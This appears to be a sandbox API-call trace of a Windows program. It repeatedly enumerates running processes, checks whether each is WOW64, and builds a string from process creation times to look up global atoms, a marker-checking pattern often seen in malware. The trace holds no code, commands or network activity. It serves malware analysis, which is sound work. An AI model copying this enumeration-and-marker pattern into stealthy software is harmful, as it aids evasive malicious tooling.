	[0105.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0105.180] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.180] CloseHandle (hObject=0x694) returned 1
	[0105.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0105.180] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.180] CloseHandle (hObject=0x694) returned 1
	[0105.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0105.180] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.180] CloseHandle (hObject=0x694) returned 1
	[0105.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0105.180] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.181] CloseHandle (hObject=0x694) returned 1
	[0105.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0105.181] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.181] CloseHandle (hObject=0x694) returned 1
	[0105.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0105.181] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.181] CloseHandle (hObject=0x694) returned 1
	[0105.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0105.181] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.181] CloseHandle (hObject=0x694) returned 1
	[0105.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0105.181] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.181] CloseHandle (hObject=0x694) returned 1
	[0105.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0105.181] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.182] CloseHandle (hObject=0x694) returned 1
	[0105.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0105.182] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.182] CloseHandle (hObject=0x694) returned 1
	[0105.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0105.182] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.182] CloseHandle (hObject=0x694) returned 1
	[0105.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0105.182] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.182] CloseHandle (hObject=0x694) returned 1
	[0105.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.182] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.182] CloseHandle (hObject=0x694) returned 1
	[0105.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.183] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.183] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0105.183] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0105.183] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0105.183] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.184] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0105.184] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.184] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0105.184] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0105.184] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0105.184] CloseHandle (hObject=0x694) returned 1
	[0105.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0105.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0105.185] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.185] CloseHandle (hObject=0x694) returned 1
	[0105.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0105.185] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.185] CloseHandle (hObject=0x694) returned 1
	[0105.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0105.185] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.185] CloseHandle (hObject=0x694) returned 1
	[0105.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0105.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0105.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0105.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0105.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0105.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0105.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0105.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0105.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0105.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0105.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0105.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0105.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0105.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0105.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0105.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0105.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0105.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0105.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0105.227] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.227] CloseHandle (hObject=0x694) returned 1
	[0105.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0105.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0105.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0105.227] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.227] CloseHandle (hObject=0x694) returned 1
	[0105.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0105.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0105.227] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.227] CloseHandle (hObject=0x694) returned 1
	[0105.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0105.228] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.228] CloseHandle (hObject=0x694) returned 1
	[0105.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0105.228] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.228] CloseHandle (hObject=0x694) returned 1
	[0105.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0105.228] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.228] CloseHandle (hObject=0x694) returned 1
	[0105.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0105.228] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.228] CloseHandle (hObject=0x694) returned 1
	[0105.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0105.229] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.229] CloseHandle (hObject=0x694) returned 1
	[0105.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0105.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0105.229] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.229] CloseHandle (hObject=0x694) returned 1
	[0105.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0105.229] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.229] CloseHandle (hObject=0x694) returned 1
	[0105.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0105.229] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.229] CloseHandle (hObject=0x694) returned 1
	[0105.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0105.230] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.230] CloseHandle (hObject=0x694) returned 1
	[0105.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0105.230] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.230] CloseHandle (hObject=0x694) returned 1
	[0105.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0105.230] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.230] CloseHandle (hObject=0x694) returned 1
	[0105.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0105.230] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.230] CloseHandle (hObject=0x694) returned 1
	[0105.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0105.230] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.230] CloseHandle (hObject=0x694) returned 1
	[0105.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0105.231] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.231] CloseHandle (hObject=0x694) returned 1
	[0105.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0105.231] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.231] CloseHandle (hObject=0x694) returned 1
	[0105.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0105.231] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.231] CloseHandle (hObject=0x694) returned 1
	[0105.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0105.231] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.231] CloseHandle (hObject=0x694) returned 1
	[0105.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0105.232] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.232] CloseHandle (hObject=0x694) returned 1
	[0105.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0105.232] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.232] CloseHandle (hObject=0x694) returned 1
	[0105.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0105.232] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.232] CloseHandle (hObject=0x694) returned 1
	[0105.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0105.232] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.232] CloseHandle (hObject=0x694) returned 1
	[0105.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0105.233] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.233] CloseHandle (hObject=0x694) returned 1
	[0105.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0105.233] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.233] CloseHandle (hObject=0x694) returned 1
	[0105.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0105.233] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.233] CloseHandle (hObject=0x694) returned 1
	[0105.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0105.233] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.233] CloseHandle (hObject=0x694) returned 1
	[0105.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0105.233] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.233] CloseHandle (hObject=0x694) returned 1
	[0105.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0105.234] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.234] CloseHandle (hObject=0x694) returned 1
	[0105.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.234] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.234] CloseHandle (hObject=0x694) returned 1
	[0105.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.234] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.235] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0105.235] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0105.235] wsprintfA (in: param_1=0x3993498, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0105.235] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.235] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0105.235] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.236] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0105.236] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0105.236] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0105.236] CloseHandle (hObject=0x694) returned 1
	[0105.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0105.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0105.236] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.236] CloseHandle (hObject=0x694) returned 1
	[0105.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0105.236] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.236] CloseHandle (hObject=0x694) returned 1
	[0105.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0105.236] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.236] CloseHandle (hObject=0x694) returned 1
	[0105.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0105.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0105.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0105.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0105.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0105.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0105.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0105.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0105.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0105.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0105.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0105.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0105.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0105.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0105.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0105.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0105.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0105.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0105.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0105.276] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.276] CloseHandle (hObject=0x694) returned 1
	[0105.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0105.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0105.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0105.277] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.277] CloseHandle (hObject=0x694) returned 1
	[0105.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0105.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0105.277] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.277] CloseHandle (hObject=0x694) returned 1
	[0105.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0105.277] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.277] CloseHandle (hObject=0x694) returned 1
	[0105.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0105.278] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.278] CloseHandle (hObject=0x694) returned 1
	[0105.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0105.278] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.278] CloseHandle (hObject=0x694) returned 1
	[0105.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0105.278] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.278] CloseHandle (hObject=0x694) returned 1
	[0105.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0105.278] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.278] CloseHandle (hObject=0x694) returned 1
	[0105.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0105.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0105.278] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.278] CloseHandle (hObject=0x694) returned 1
	[0105.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0105.279] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.279] CloseHandle (hObject=0x694) returned 1
	[0105.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0105.279] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.279] CloseHandle (hObject=0x694) returned 1
	[0105.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0105.279] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.279] CloseHandle (hObject=0x694) returned 1
	[0105.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0105.279] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.279] CloseHandle (hObject=0x694) returned 1
	[0105.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0105.279] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.279] CloseHandle (hObject=0x694) returned 1
	[0105.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0105.280] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.280] CloseHandle (hObject=0x694) returned 1
	[0105.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0105.280] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.280] CloseHandle (hObject=0x694) returned 1
	[0105.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0105.280] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.280] CloseHandle (hObject=0x694) returned 1
	[0105.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0105.280] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.280] CloseHandle (hObject=0x694) returned 1
	[0105.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0105.280] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.280] CloseHandle (hObject=0x694) returned 1
	[0105.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0105.281] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.281] CloseHandle (hObject=0x694) returned 1
	[0105.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0105.281] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.281] CloseHandle (hObject=0x694) returned 1
	[0105.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0105.281] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.281] CloseHandle (hObject=0x694) returned 1
	[0105.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0105.281] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.281] CloseHandle (hObject=0x694) returned 1
	[0105.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0105.282] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.282] CloseHandle (hObject=0x694) returned 1
	[0105.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0105.282] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.282] CloseHandle (hObject=0x694) returned 1
	[0105.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
